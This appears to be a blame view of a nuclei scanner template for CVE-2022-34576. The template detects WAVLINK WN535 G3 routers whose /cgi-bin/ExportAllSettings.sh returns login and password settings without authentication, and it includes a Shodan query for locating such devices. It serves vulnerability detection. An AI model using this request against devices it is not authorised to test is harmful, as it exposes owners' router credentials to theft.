nuclei-templates/cves/2022/CVE-2022-34576.yaml

37 lines
955 B
YAML
Raw Normal View History

2022-08-14 20:19:06 +00:00
id: CVE-2022-34576
info:
name: WAVLINK WN535 G3 - Access Control
author: arafatansari
severity: high
description: |
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
reference:
2022-08-15 06:23:42 +00:00
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-34576
classification:
cve-id: CVE-2022-34576
2022-08-14 20:19:06 +00:00
metadata:
2022-08-15 06:23:42 +00:00
verified: true
2022-08-14 20:19:06 +00:00
shodan-query: http.html:"Wavlink"
2022-08-15 06:23:42 +00:00
tags: cve,cve2022,wavlink,exposure
2022-08-14 20:19:06 +00:00
requests:
2022-08-15 06:23:42 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
2022-08-14 20:19:06 +00:00
matchers-condition: and
matchers:
2022-08-15 06:23:42 +00:00
- type: word
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
2022-08-14 20:19:06 +00:00
- type: status
status:
- 200